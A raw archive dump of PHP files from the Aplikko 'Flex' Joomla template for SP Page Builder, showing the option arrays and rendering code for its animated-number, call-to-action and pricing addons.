					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_DURATION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_DURATION_DESC'),
					'placeholder'=>'1000',
					'std'=>'1000',
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),
				
				'counter_separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_OPTIONS'),
				),

				'counter_title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_TITLE_DESC'),
					'std'=>'Animated Number',
				),
				
				'counter_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_TITLE_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_TITLE_COLOR_DESC'),
				),
				
				'title_font_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_TITLE_FONT_SIZE_DESC'),
					'placeholder'=>18,
					'std'=>array(
						'md'=>18
					),
					'responsive'=>true,
					'max'=>400
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_FONT_FAMILY'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-animated-number-title{ font-family: {{ VALUE }}; }'
					)
				),

				'title_line_height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_TITLE_LINE_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_TITLE_LINE_HEIGHT_DESC'),
					'placeholder'=>36,
					'std'=>array(
						'md'=>36
					),
					'responsive'=>true,
					'max'=>400
				),

				'title_fontstyle'=>array(
					'type'=>'fontstyle',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_TITLE_FONT_STYLE'),
				),

				'title_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
					'responsive'=>true,
					'std'=>array('md'=>'','sm'=>'','xs'=>''),
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),

				
				'separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_STYLING'),
				),
				
				'color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_COLOR_DESC'),
				),

				'font_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_FONT_SIZE_DESC'),
					'placeholder'=>36,
					'std'=>array(
						'md'=>36
					),
					'responsive'=>true,
					'max'=>400
				),

				'number_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_FONT_FAMILY_DESC'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-animated-number { font-family: {{ VALUE }}; }'
					)
				),
				
				'number_addtext_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT_FONT_FAMILY_DESC'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.number_addtext { font-family: {{ VALUE }}; }'
					)
				),
			

				'line_height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_LINE_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_LINE_HEIGHT_DESC'),
					'placeholder'=>36,
					'std'=>array(
						'md'=>36
					),
					'responsive'=>true,
					'max'=>400
				),

				'number_font_weight'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_FONT_WEIGHT_DESC'),
					'values'=>array(
						100=>100,
						200=>200,
						300=>300,
						400=>400,
						500=>500,
						600=>600,
						700=>700,
						800=>800,
						900=>900,
					),
				),
				
				'background'=>array(
					'type'=>'color',
					'title'=>JText::_('FLEX_GLOBAL_BACKGROUND'),
					),
				'border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('FLEX_GLOBAL_BORDER_COLOR'),
					),
				'border_width'=>array(
					'type'=>'number',
					'title'=>JText::_('FLEX_GLOBAL_BORDER_WIDTH_SIZE'),
					'placeholder'=>'1',
					),
				'border_radius'=>array(
					'type'=>'number',
					'title'=>JText::_('FLEX_GLOBAL_BORDER_RADIUS'),
					'placeholder'=>'5',
					),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),
			),
		),
	)
);
PK!z�7�3�32flex/sppagebuilder/addons/call_to_action/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_call_to_action',
		//'category'=>'General',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				//Title
				'separator_title_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_OPTIONS')
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_TITLE_DESC'),
					'std'=>'Call to action title',
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_lineheight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_bottom'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				// Subtitle
				'separator_subtitle_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_SUBTITLE_OPTIONS')
				),

				'subtitle'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_SUBTITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_SUBTITLE_DESC'),
					'std'=>'Call to action sub title',
				),

				'subtitle_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_SUB_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_SUB_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('subtitle', '!=', '')),
				),

				'subtitle_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_SUB_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_SUB_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('subtitle', '!=', '')),
				),

				// Text
				'separator_content_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_CONTENT')
				),

				'text'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_CONTENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_CONTENT_DESC'),
				),

				//Button
				'separator_button_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_BUTTON_OPTIONS')
				),

				'button_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
					'std'=>'Button Text',
				),

				'button_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>''
				),

				'button_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0'
				),

				'button_url'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
					'placeholder'=>'http://',
				),

				'button_target'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
					),
					'depends'=>array(array('button_url', '!=', '')),
				),

				'button_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_BUTTON_POSITION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CTA_BUTTON_POSITION_DESC'),
					'values'=>array(
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
						'bottom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BOTTOM'),
					),
				),

				'button_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std'=>'default',
				),

				'button_appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'flat',
				),

				'button_background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#444444',
					'depends'=>array('button_type'=>'custom'),
				),

				'button_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#fff',
					'depends'=>array('button_type'=>'custom'),
				),

				'button_background_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#222',
					'depends'=>array('button_type'=>'custom'),
				),

				'button_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#fff',
					'depends'=>array('button_type'=>'custom'),
				),

				'button_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
				),

				'button_shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
				),

				'button_block'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
					),
				),
				
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
					'values'=> $peicon_list
				),	

				'button_icon'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
				),

				'icon_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!��6ZZ1flex/sppagebuilder/addons/call_to_action/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2016 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonCall_to_action extends SppagebuilderAddons {

	public function render() {
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$style = (isset($this->addon->settings->style) && $this->addon->settings->style) ? $this->addon->settings->style : 'panel-default';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		//Addon Options
		$subtitle = (isset($this->addon->settings->subtitle) && $this->addon->settings->subtitle) ? $this->addon->settings->subtitle : '';
		$text = (isset($this->addon->settings->text) && $this->addon->settings->text) ? $this->addon->settings->text : '';
		$button_text = (isset($this->addon->settings->button_text) && $this->addon->settings->button_text) ? $this->addon->settings->button_text : '';
		$button_url = (isset($this->addon->settings->button_url) && $this->addon->settings->button_url) ? $this->addon->settings->button_url : '';
		$button_classes = (isset($this->addon->settings->button_size) && $this->addon->settings->button_size) ? ' sppb-btn-' . $this->addon->settings->button_size : '';
		$button_classes .= (isset($this->addon->settings->button_type) && $this->addon->settings->button_type) ? ' sppb-btn-' . $this->addon->settings->button_type : '';
		$button_classes .= (isset($this->addon->settings->button_shape) && $this->addon->settings->button_shape) ? ' sppb-btn-' . $this->addon->settings->button_shape: ' sppb-btn-rounded';
		$button_classes .= (isset($this->addon->settings->button_appearance) && $this->addon->settings->button_appearance) ? ' sppb-btn-' . $this->addon->settings->button_appearance : '';
		$button_classes .= (isset($this->addon->settings->button_block) && $this->addon->settings->button_block) ? ' ' . $this->addon->settings->button_block : '';
		//Pixeden Icons
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name: '';
		$button_icon = (isset($this->addon->settings->button_icon) && $this->addon->settings->button_icon) ? $this->addon->settings->button_icon : '';
		$button_icon_position = (isset($this->addon->settings->button_icon_position) && $this->addon->settings->button_icon_position) ? $this->addon->settings->button_icon_position: 'left';

		$button_position = (isset($this->addon->settings->button_position) && $this->addon->settings->button_position) ? $this->addon->settings->button_position : '';
		$button_attribs = (isset($this->addon->settings->button_target) && $this->addon->settings->button_target) ? ' target="' . $this->addon->settings->button_target . '"' : '';
		$button_attribs .= (isset($this->addon->settings->button_url) && $this->addon->settings->button_url) ? ' href="' . $this->addon->settings->button_url . '"' : '';

		// Generate Button
		if($button_icon_position == 'left') {
			
			if($button_icon || $peicon_name) {
				if ($peicon_name) {
					$button_text = ($peicon_name) ? '<i class="pe ' . $peicon_name . '"></i> ' . $button_text : $button_text;
				}else{
					$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
				}	
			} else {
				
				if ($peicon_name) {
					$button_text = ($peicon_name) ? $button_text . ' <i class="pe ' . $peicon_name . '"></i>' : $button_text;
				}else{
					$button_text = ($button_icon) ? $button_text . ' <i class="fa ' . $button_icon . '"></i>' : $button_text;
				}
			}
		
		}
		
		$button_output = '<a' . $button_attribs . ' id="btn-'. $this->addon->id .'" class="sppb-btn' . $button_classes . '">' . $button_text . '</a>';
		

		// Addon Output
		$output  = '<div class="sppb-addon sppb-addon-cta ' . $class . '">';

		if($button_position=='right') {
			//$output .= '<div class="sppb-container">';
			$output .= '<div class="sppb-row">';
			$output .= '<div class="col-sm-8">';
			$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title sppb-cta-title">' . $title . '</'.$heading_selector.'>' : '';
			$output .= ($subtitle) ? '<p class="sppb-lead sppb-cta-subtitle">' . $subtitle . '</p>' : '';
			$output .= ($text) ? '<p class="sppb-cta-text">' . $text . '</p>' : '';
			$output .= '</div>';
			$output .= '<div class="col-sm-4 sppb-text-right">';
			$output .= $button_output;
			$output .= '</div>';
			$output .= '</div>';
		} else {
			$output .= '<div class="text-center">';
			$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title sppb-cta-title">' . $title . '</'.$heading_selector.'>' : '';
			$output .= ($subtitle) ? '<p class="sppb-lead sppb-cta-subtitle">' . $subtitle . '</p>' : '';
			$output .= ($text) ? '<p class="sppb-cta-text">' . $text . '</p>' : '';
			$output .= '<div>';
			$output .= $button_output;
			$output .= '</div>';
			$output .= '</div>';
			//$output .= '</div>';
		}

		$output .= '</div>';

		return $output;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css_path = new JLayoutFile('addon.css.button', $layout_path);
		$number_style = '';
		$text_style = '';

		$style = (isset($this->addon->settings->background) && $this->addon->settings->background) ? "background-color: " . $this->addon->settings->background  . ";" : '';
		$style .= (isset($this->addon->settings->color) && $this->addon->settings->color) ? "color: " . $this->addon->settings->color  . ";" : '';
		$style .= (isset($this->addon->settings->padding) && $this->addon->settings->padding) ? "padding: " . $this->addon->settings->padding  . ";" : "padding: 40px 20px;";

		// Sub title
		$subtitle_style = (isset($this->addon->settings->subtitle_text_color) && $this->addon->settings->subtitle_text_color) ? 'color:' . $this->addon->settings->subtitle_text_color  . ';' : '';
		$subtitle_style .= (isset($this->addon->settings->subtitle_fontsize) && $this->addon->settings->subtitle_fontsize) ? 'font-size: ' . $this->addon->settings->subtitle_fontsize . 'px; line-height: ' . $this->addon->settings->subtitle_fontsize . 'px;' : '';

		$css = '';
		if($style) {
			$css .= $addon_id . ' .sppb-addon-cta {';
			$css .= $style;
			$css .= '}';
		}

		if($subtitle_style) {
			$css .= $addon_id . ' .sppb-cta-subtitle {';
			$css .= $subtitle_style;
			$css .= '}';
		}

		// Button options
		$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $this->addon->settings, 'id' => 'btn-' . $this->addon->id));;

		return $css;
	}

}
PK!�x��3�3+flex/sppagebuilder/addons/pricing/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

